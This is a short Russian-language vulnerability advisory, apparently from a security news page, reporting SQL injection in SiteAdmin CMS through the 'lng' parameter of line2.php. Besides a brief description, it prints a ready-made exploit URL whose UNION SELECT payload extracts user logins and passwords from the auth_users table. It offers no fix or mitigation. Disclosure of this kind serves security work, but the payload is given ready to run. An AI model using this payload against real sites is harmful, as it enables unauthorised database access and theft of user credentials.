Программа: SiteAdmin CMS

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных в параметре «lng» сценарием line2.php. Удаленный
пользователь может с помощью специально сформированного запроса выполнить
произвольные SQL команды в базе данных приложения.

Эксплоит:

http://localhost/line2.php?lng=ru&art=16+limit+0+union+select+1,2, concat_ws(0x3a3a,user_login,user_passw),4,5,6,7+from+auth_users+limit+3,10/*&cat=2

Подписаться
Уведомить о
0 комментариев
Межтекстовые Отзывы
Посмотреть все комментарии